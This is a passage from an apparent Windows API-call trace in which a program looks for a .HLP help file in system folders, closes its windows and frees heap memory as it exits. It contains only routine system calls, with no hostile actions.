lpString1=0x18f220, lpString2="c:\\windows\\system32", iMaxLength=260 | out: lpString1="c:\\windows\\system32") returned="c:\\windows\\system32" [0083.398] lstrlenA (lpString="c:\\windows\\system32") returned 19 [0083.398] RtlReAllocateHeap (Heap=0x2620000, Flags=0x0, Ptr=0x263a880, Size=0x14) returned 0x263a8a0 [0083.398] lstrlenA (lpString="c:\\windows\\system32") returned 19 [0083.398] RtlReAllocateHeap (Heap=0x2620000, Flags=0x0, Ptr=0x263a890, Size=0x14) returned 0x263a8c0 [0083.398] lstrcpyA (in: lpString1=0x263a8a0, lpString2="c:\\windows\\system32" | out: lpString1="c:\\windows\\system32") returned="c:\\windows\\system32" [0083.398] lstrcpynA (in: lpString1=0x18f228, lpString2=".HLP", iMaxLength=260 | out: lpString1=".HLP") returned=".HLP" [0083.398] lstrlenA (lpString=".HLP") returned 4 [0083.398] lstrlenA (lpString="c:\\windows\\system32") returned 19 [0083.398] RtlReAllocateHeap (Heap=0x2620000, Flags=0x0, Ptr=0x263a8a0, Size=0x19) returned 0x263a8e0 [0083.398] lstrlenA (lpString="c:\\windows\\system32") returned 19 [0083.398] RtlReAllocateHeap (Heap=0x2620000, Flags=0x0, Ptr=0x263a8c0, Size=0x19) returned 0x263a880 [0083.398] lstrcatA (in: lpString1="c:\\windows\\system32", lpString2="\\" | out: lpString1="c:\\windows\\system32\\") returned="c:\\windows\\system32\\" [0083.398] lstrcatA (in: lpString1="c:\\windows\\system32\\", lpString2=".HLP" | out: lpString1="c:\\windows\\system32\\.HLP") returned="c:\\windows\\system32\\.HLP" [0083.399] lstrlenA (lpString="c:\\windows\\system32\\.HLP") returned 24 [0083.399] CharToOemBuffA (in: lpszSrc="c:\\windows\\system32\\.HLP", lpszDst=0x18f22c, cchDstLength=0x19 | out: lpszDst="c:\\windows\\system32\\.HLP") returned 1 [0083.399] GetFileAttributesA (lpFileName="c:\\windows\\system32\\.HLP" (normalized: "c:\\windows\\system32\\.hlp")) returned 0xffffffff [0083.538] GetLastError () returned 0x2 [0083.538] GetLastError () returned 0x2 [0083.538] SetLastError (dwErrCode=0x2) [0083.538] GetLastError () returned 0x2 [0083.538] SetLastError (dwErrCode=0x2) [0083.538] GetFileAttributesA (lpFileName="c:\\windows\\system32\\.HLP" (normalized: "c:\\windows\\system32\\.hlp")) returned 0xffffffff [0083.538] GetLastError () returned 0x2 [0083.538] GetLastError () returned 0x2 [0083.538] SetLastError (dwErrCode=0x2) [0083.538] GetLastError () returned 0x2 [0083.538] SetLastError (dwErrCode=0x2) [0083.538] GetWindowsDirectoryA (in: lpBuffer=0x18f348, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0083.538] lstrlenA (lpString="C:\\Windows") returned 10 [0083.538] lstrlenA (lpString="C:\\Windows") returned 10 [0083.538] lstrlenA (lpString="C:\\Windows\\") returned 11 [0083.538] lstrcpynA (in: lpString1=0x18f22c, lpString2="C:\\Windows\\Help", iMaxLength=260 | out: lpString1="C:\\Windows\\Help") returned="C:\\Windows\\Help" [0083.538] lstrlenA (lpString="C:\\Windows\\Help") returned 15 [0083.538] RtlReAllocateHeap (Heap=0x2620000, Flags=0x0, Ptr=0x263a8e0, Size=0x10) returned 0x263a8e0 [0083.538] lstrlenA (lpString="C:\\Windows\\Help") returned 15 [0083.538] RtlReAllocateHeap (Heap=0x2620000, Flags=0x0, Ptr=0x263a880, Size=0x10) returned 0x263a880 [0083.538] lstrcpyA (in: lpString1=0x263a8e0, lpString2="C:\\Windows\\Help" | out: lpString1="C:\\Windows\\Help") returned="C:\\Windows\\Help" [0083.538] lstrcpynA (in: lpString1=0x18f228, lpString2=".HLP", iMaxLength=260 | out: lpString1=".HLP") returned=".HLP" [0083.539] lstrlenA (lpString=".HLP") returned 4 [0083.539] lstrlenA (lpString="C:\\Windows\\Help") returned 15 [0083.539] RtlReAllocateHeap (Heap=0x2620000, Flags=0x0, Ptr=0x263a8e0, Size=0x15) returned 0x263a8e0 [0083.539] lstrlenA (lpString="C:\\Windows\\Help") returned 15 [0083.539] RtlReAllocateHeap (Heap=0x2620000, Flags=0x0, Ptr=0x263a880, Size=0x15) returned 0x263a880 [0083.539] lstrcatA (in: lpString1="C:\\Windows\\Help", lpString2="\\" | out: lpString1="C:\\Windows\\Help\\") returned="C:\\Windows\\Help\\" [0083.539] lstrcatA (in: lpString1="C:\\Windows\\Help\\", lpString2=".HLP" | out: lpString1="C:\\Windows\\Help\\.HLP") returned="C:\\Windows\\Help\\.HLP" [0083.539] lstrlenA (lpString="C:\\Windows\\Help\\.HLP") returned 20 [0083.539] CharToOemBuffA (in: lpszSrc="C:\\Windows\\Help\\.HLP", lpszDst=0x18f22c, cchDstLength=0x15 | out: lpszDst="C:\\Windows\\Help\\.HLP") returned 1 [0083.539] GetFileAttributesA (lpFileName="C:\\Windows\\Help\\.HLP" (normalized: "c:\\windows\\help\\.hlp")) returned 0xffffffff [0083.562] GetLastError () returned 0x2 [0083.562] GetLastError () returned 0x2 [0083.562] SetLastError (dwErrCode=0x2) [0083.562] GetLastError () returned 0x2 [0083.562] SetLastError (dwErrCode=0x2) [0083.562] GetFileAttributesA (lpFileName="C:\\Windows\\Help\\.HLP" (normalized: "c:\\windows\\help\\.hlp")) returned 0xffffffff [0083.562] GetLastError () returned 0x2 [0083.562] GetLastError () returned 0x2 [0083.562] SetLastError (dwErrCode=0x2) [0083.562] GetLastError () returned 0x2 [0083.562] SetLastError (dwErrCode=0x2) [0083.562] lstrlenA (lpString="") returned 0 [0083.562] lstrcpyA (in: lpString1=0x18f23c, lpString2="" | out: lpString1="") returned="" [0083.563] lstrlenA (lpString=".HLP") returned 4 [0083.563] lstrlenA (lpString="") returned 0 [0083.563] lstrcpynA (in: lpString1=0x18f34c, lpString2="", iMaxLength=260 | out: lpString1="") returned="" [0083.563] lstrlenA (lpString="") returned 0 [0083.563] RtlReAllocateHeap (Heap=0x2620000, Flags=0x0, Ptr=0x263a8e0, Size=0x1) returned 0x263a8e0 [0083.563] RtlReAllocateHeap (Heap=0x2620000, Flags=0x0, Ptr=0x263a880, Size=0x1) returned 0x263a880 [0083.563] lstrcpyA (in: lpString1=0x263a8e0, lpString2="" | out: lpString1="") returned="" [0083.563] lstrcpyA (in: lpString1=0x18f97c, lpString2="" | out: lpString1="") returned="" [0083.563] lstrlenA (lpString="") returned 0 [0083.563] lstrlenA (lpString="") returned 0 [0083.563] lstrcatA (in: lpString1="", lpString2="" | out: lpString1="") returned="" [0083.563] GetDesktopWindow () returned 0x10010 [0083.563] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x263a880 | out: hHeap=0x2620000) returned 1 [0083.563] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x263a8e0 | out: hHeap=0x2620000) returned 1 [0083.563] CoFreeUnusedLibraries () [0083.881] GetCurrentThreadId () returned 0xa48 [0083.881] DestroyWindow (hWnd=0x50122) returned 1 [0083.881] NtdllDefWindowProc_A (hWnd=0x50122, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0083.882] NtdllDefWindowProc_A (hWnd=0x50122, Msg=0x46, wParam=0x0, lParam=0x18fc0c) returned 0x0 [0083.882] NtdllDefWindowProc_A (hWnd=0x50122, Msg=0x47, wParam=0x0, lParam=0x18fc0c) returned 0x0 [0083.882] NtdllDefWindowProc_A (hWnd=0x50122, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0083.882] NtdllDefWindowProc_A (hWnd=0x4011e, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0083.882] NtdllDefWindowProc_A (hWnd=0x4011e, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0083.883] PostQuitMessage (nExitCode=0) [0083.883] NtdllDefWindowProc_A (hWnd=0x50122, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0083.883] NtdllDefWindowProc_A (hWnd=0x50122, Msg=0x1050, wParam=0x0, lParam=0x0) returned 0x0 [0083.883] PeekMessageA (in: lpMsg=0x18fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fe58) returned 1 [0083.883] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635668 | out: hHeap=0x2620000) returned 1 [0083.883] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632148 | out: hHeap=0x2620000) returned 1 [0083.883] GetCurrentThreadId () returned 0xa48 [0083.883] GetCurrentThreadId () returned 0xa48 [0083.883] GetCurrentThreadId () returned 0xa48 [0083.884] GetCurrentThreadId () returned 0xa48 [0083.884] WaitForSingleObject (hHandle=0x80, dwMilliseconds=0xffffffff) returned 0x0 [0083.884] ResetEvent (hEvent=0x7c) returned 1 [0083.884] ReleaseMutex (hMutex=0x80) returned 1 [0083.884] SetEvent (hEvent=0x7c) returned 1 [0083.884] GetCurrentThreadId () returned 0xa48 [0083.884] GetCurrentThreadId () returned 0xa48 [0083.885] GetCurrentThreadId () returned 0xa48 [0083.885] PostMessageA (hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 1 [0083.886] GetCurrentThreadId () returned 0xa48 [0083.886] GetCurrentThreadId () returned 0xa48 [0083.886] GetCurrentThreadId () returned 0xa48 [0083.886] GetCurrentThreadId () returned 0xa48 [0083.886] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0083.886] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2636330 | out: hHeap=0x2620000) returned 1 [0083.886] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635638 | out: hHeap=0x2620000) returned 1 [0083.886] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635650 | out: hHeap=0x2620000) returned 1 [0083.886] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x263a778 | out: hHeap=0x2620000) returned 1 [0083.887] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2638380 | out: hHeap=0x2620000) returned 1 [0083.887] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2637a90 | out: hHeap=0x2620000) returned 1 [0083.887] GetCurrentThreadId () returned 0xa48 [0083.887] GetCurrentThreadId () returned 0xa48 [0083.887] GetCurrentThreadId () returned 0xa48 [0083.887] WaitForSingleObject (hHandle=0x80, dwMilliseconds=0xffffffff) returned 0x0 [0083.887] ResetEvent (hEvent=0x7c) returned 1 [0083.887] ReleaseMutex (hMutex=0x80) returned 1 [0083.887] SetEvent (hEvent=0x7c) returned 1 [0083.887] WaitForSingleObject (hHandle=0x80, dwMilliseconds=0xffffffff) returned 0x0 [0083.887] ResetEvent (hEvent=0x7c) returned 1 [0083.888] ReleaseMutex (hMutex=0x80) returned 1 [0083.888] SetEvent (hEvent=0x7c) returned 1 [0083.888] GetCurrentThreadId () returned 0xa48 [0083.888] PostMessageA (hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 1 [0083.889] WaitForSingleObject (hHandle=0x80, dwMilliseconds=0xffffffff) returned 0x0 [0083.889] ResetEvent (hEvent=0x7c) returned 1 [0083.889] ReleaseMutex (hMutex=0x80) returned 1 [0083.889] SetEvent (hEvent=0x7c) returned 1 [0083.889] GetCurrentThreadId () returned 0xa48 [0083.889] WaitForSingleObject (hHandle=0x80, dwMilliseconds=0xffffffff) returned 0x0 [0083.889] ResetEvent (hEvent=0x7c) returned 1 [0083.889] ReleaseMutex (hMutex=0x80) returned 1 [0083.889] SetEvent (hEvent=0x7c) returned 1 [0083.890] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2637a30 | out: hHeap=0x2620000) returned 1 [0083.890] IMalloc:Free (This=0x757266bc, pv=0x5797f8) [0083.890] IMalloc:Free (This=0x757266bc, pv=0x5797d0) [0083.890] IMalloc:Free (This=0x757266bc, pv=0x57d780) [0083.891] IMalloc:Free (This=0x757266bc, pv=0x57cc20) [0083.891] IMalloc:Free (This=0x757266bc, pv=0x57d710) [0083.891] IMalloc:Free (This=0x757266bc, pv=0x57d6a0) [0083.891] IMalloc:Free (This=0x757266bc, pv=0x57d630) [0083.891] IMalloc:Free (This=0x757266bc, pv=0x578ea0) [0083.891] WaitForMultipleObjects (nCount=0x2, lpHandles=0x18fe94*=0x80, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0083.891] GetCurrentThreadId () returned 0xa48 [0083.891] GetCurrentThreadId () returned 0xa48 [0083.891] WaitForMultipleObjects (nCount=0x2, lpHandles=0x18fe5c*=0x80, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0083.891] Sleep (dwMilliseconds=0x0) [0084.064] ReleaseMutex (hMutex=0x80) returned 1 [0084.064] GetCurrentThreadId () returned 0xa48 [0084.064] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2622270 | out: hHeap=0x2620000) returned 1 [0084.064] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2622208 | out: hHeap=0x2620000) returned 1 [0084.064] GetCurrentThreadId () returned 0xa48 [0084.064] WaitForSingleObject (hHandle=0x80, dwMilliseconds=0xffffffff) returned 0x0 [0084.064] ResetEvent (hEvent=0x7c) returned 1 [0084.064] ReleaseMutex (hMutex=0x80) returned 1 [0084.064] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2622cc0 | out: hHeap=0x2620000) returned 1 [0084.064] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2622ca8 | out: hHeap=0x2620000) returned 1 [0084.065] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2622b88 | out: hHeap=0x2620000) returned 1 [0084.065] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2622f58 | out: hHeap=0x2620000) returned 1 [0084.065] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26230e8 | out: hHeap=0x2620000) returned 1 [0084.065] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2623170 | out: hHeap=0x2620000) returned 1 [0084.065] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2637ba0 | out: hHeap=0x2620000) returned 1 [0084.065] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2622f48 | out: hHeap=0x2620000) returned 1 [0084.065] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2622e28 | out: hHeap=0x2620000) returned 1 [0084.065] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26235c8 | out: hHeap=0x2620000) returned 1 [0084.065] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2623600 | out: hHeap=0x2620000) returned 1 [0084.065] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26235b0 | out: hHeap=0x2620000) returned 1 [0084.065] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2623490 | out: hHeap=0x2620000) returned 1 [0084.065] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2623800 | out: hHeap=0x2620000) returned 1 [0084.065] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2623828 | out: hHeap=0x2620000) returned 1 [0084.065] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26237e8 | out: hHeap=0x2620000) returned 1 [0084.065] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26236c8 | out: hHeap=0x2620000) returned 1 [0084.065] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26239f0 | out: hHeap=0x2620000) returned 1 [0084.065] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2623b80 | out: hHeap=0x2620000) returned 1 [0084.066] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2623c08 | out: hHeap=0x2620000) returned 1 [0084.066] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26239d8 | out: hHeap=0x2620000) returned 1 [0084.066] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26238b8 | out: hHeap=0x2620000) returned 1 [0084.066] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2624058 | out: hHeap=0x2620000) returned 1 [0084.066] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26240e8 | out: hHeap=0x2620000) returned 1 [0084.066] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2624048 | out: hHeap=0x2620000) returned 1 [0084.066] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2623f28 | out: hHeap=0x2620000) returned 1 [0084.066] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2624408 | out: hHeap=0x2620000) returned 1 [0084.066] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26245f8 | out: hHeap=0x2620000) returned 1 [0084.066] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26246b0 | out: hHeap=0x2620000) returned 1 [0084.066] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2622df8 | out: hHeap=0x2620000) returned 1 [0084.066] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26242e8 | out: hHeap=0x2620000) returned 1 [0084.066] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2624ba0 | out: hHeap=0x2620000) returned 1 [0084.066] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2624d38 | out: hHeap=0x2620000) returned 1 [0084.066] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2624dc8 | out: hHeap=0x2620000) returned 1 [0084.066] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2622e10 | out: hHeap=0x2620000) returned 1 [0084.066] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2624a80 | out: hHeap=0x2620000) returned 1 [0084.067] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2625238 | out: hHeap=0x2620000) returned 1 [0084.067] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2625408 | out: hHeap=0x2620000) returned 1 [0084.067] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26254b8 | out: hHeap=0x2620000) returned 1 [0084.067] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2625220 | out: hHeap=0x2620000) returned 1 [0084.067] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2625100 | out: hHeap=0x2620000) returned 1 [0084.067] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26259b0 | out: hHeap=0x2620000) returned 1 [0084.067] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2625b28 | out: hHeap=0x2620000) returned 1 [0084.067] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2625b98 | out: hHeap=0x2620000) returned 1 [0084.067] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2625998 | out: hHeap=0x2620000) returned 1 [0084.067] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2625878 | out: hHeap=0x2620000) returned 1 [0084.067] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2626000 | out: hHeap=0x2620000) returned 1 [0084.067] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26260f8 | out: hHeap=0x2620000) returned 1 [0084.067] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2625fc0 | out: hHeap=0x2620000) returned 1 [0084.067] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2626148 | out: hHeap=0x2620000) returned 1 [0084.067] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2625fa8 | out: hHeap=0x2620000) returned 1 [0084.067] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2625e88 | out: hHeap=0x2620000) returned 1 [0084.067] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2626568 | out: hHeap=0x2620000) returned 1 [0084.067] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2626690 | out: hHeap=0x2620000) returned 1 [0084.067] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2624270 | out: hHeap=0x2620000) returned 1 [0084.067] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26266f8 | out: hHeap=0x2620000) returned 1 [0084.067] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2624258 | out: hHeap=0x2620000) returned 1 [0084.067] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2626448 | out: hHeap=0x2620000) returned 1 [0084.068] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2626aa0 | out: hHeap=0x2620000) returned 1 [0084.068] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2626b58 | out: hHeap=0x2620000) returned 1 [0084.068] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2626a70 | out: hHeap=0x2620000) returned 1 [0084.068] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2626b98 | out: hHeap=0x2620000) returned 1 [0084.068] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26242d0 | out: hHeap=0x2620000) returned 1 [0084.068] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2626950 | out: hHeap=0x2620000) returned 1 [0084.068] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2631720 | out: hHeap=0x2620000) returned 1 [0084.068] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2631800 | out: hHeap=0x2620000) returned 1 [0084.068] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26316f0 | out: hHeap=0x2620000) returned 1 [0084.068] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2631850 | out: hHeap=0x2620000) returned 1 [0084.068] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2626e68 | out: hHeap=0x2620000) returned 1 [0084.068] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2626d48 | out: hHeap=0x2620000) returned 1 [0084.068] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2631ba8 | out: hHeap=0x2620000) returned 1 [0084.068] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2631ca0 | out: hHeap=0x2620000) returned 1 [0084.068] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2631b78 | out: hHeap=0x2620000) returned 1 [0084.068] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2631cf0 | out: hHeap=0x2620000) returned 1 [0084.068] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2631b60 | out: hHeap=0x2620000) returned 1 [0084.068] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2631a40 | out: hHeap=0x2620000) returned 1 [0084.068] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632c58 | out: hHeap=0x2620000) returned 1 [0084.068] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632d38 | out: hHeap=0x2620000) returned 1 [0084.068] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632c28 | out: hHeap=0x2620000) returned 1 [0084.068] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632d90 | out: hHeap=0x2620000) returned 1 [0084.068] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632c10 | out: hHeap=0x2620000) returned 1 [0084.068] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632af0 | out: hHeap=0x2620000) returned 1 [0084.069] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26331d0 | out: hHeap=0x2620000) returned 1 [0084.069] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2626360 | out: hHeap=0x2620000) returned 1 [0084.069] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26332e0 | out: hHeap=0x2620000) returned 1 [0084.069] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2626348 | out: hHeap=0x2620000) returned 1 [0084.069] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26330b0 | out: hHeap=0x2620000) returned 1 [0084.069] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635918 | out: hHeap=0x2620000) returned 1 [0084.069] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26263b8 | out: hHeap=0x2620000) returned 1 [0084.069] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635a28 | out: hHeap=0x2620000) returned 1 [0084.069] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635530 | out: hHeap=0x2620000) returned 1 [0084.069] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2633530 | out: hHeap=0x2620000) returned 1 [0084.069] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635c60 | out: hHeap=0x2620000) returned 1 [0084.069] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635cf8 | out: hHeap=0x2620000) returned 1 [0084.069] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2626418 | out: hHeap=0x2620000) returned 1 [0084.069] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635d28 | out: hHeap=0x2620000) returned 1 [0084.069] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635548 | out: hHeap=0x2620000) returned 1 [0084.069] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2633658 | out: hHeap=0x2620000) returned 1 [0084.069] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635ea8 | out: hHeap=0x2620000) returned 1 [0084.069] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635f40 | out: hHeap=0x2620000) returned 1 [0084.069] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635e78 | out: hHeap=0x2620000) returned 1 [0084.069] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635f70 | out: hHeap=0x2620000) returned 1 [0084.069] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635560 | out: hHeap=0x2620000) returned 1 [0084.069] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2633780 | out: hHeap=0x2620000) returned 1 [0084.069] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26360c0 | out: hHeap=0x2620000) returned 1 [0084.069] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2622dc8 | out: hHeap=0x2620000) returned 1 [0084.069] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635590 | out: hHeap=0x2620000) returned 1 [0084.070] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26360f8 | out: hHeap=0x2620000) returned 1 [0084.070] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635578 | out: hHeap=0x2620000) returned 1 [0084.070] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26338a8 | out: hHeap=0x2620000) returned 1 [0084.070] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632f90 | out: hHeap=0x2620000) returned 1 [0084.070] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2633058 | out: hHeap=0x2620000) returned 1 [0084.070] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632f60 | out: hHeap=0x2620000) returned 1 [0084.070] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2636340 | out: hHeap=0x2620000) returned 1 [0084.070] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26355a8 | out: hHeap=0x2620000) returned 1 [0084.070] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26339d0 | out: hHeap=0x2620000) returned 1 [0084.070] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2636518 | out: hHeap=0x2620000) returned 1 [0084.070] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26365e8 | out: hHeap=0x2620000) returned 1 [0084.070] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26364e8 | out: hHeap=0x2620000) returned 1 [0084.070] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2636640 | out: hHeap=0x2620000) returned 1 [0084.070] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26355c0 | out: hHeap=0x2620000) returned 1 [0084.070] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2633af8 | out: hHeap=0x2620000) returned 1 [0084.070] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2636828 | out: hHeap=0x2620000) returned 1 [0084.070] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2636920 | out: hHeap=0x2620000) returned 1 [0084.070] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26367f8 | out: hHeap=0x2620000) returned 1 [0084.070] HeapFree (in: hHeap=0x2620000, 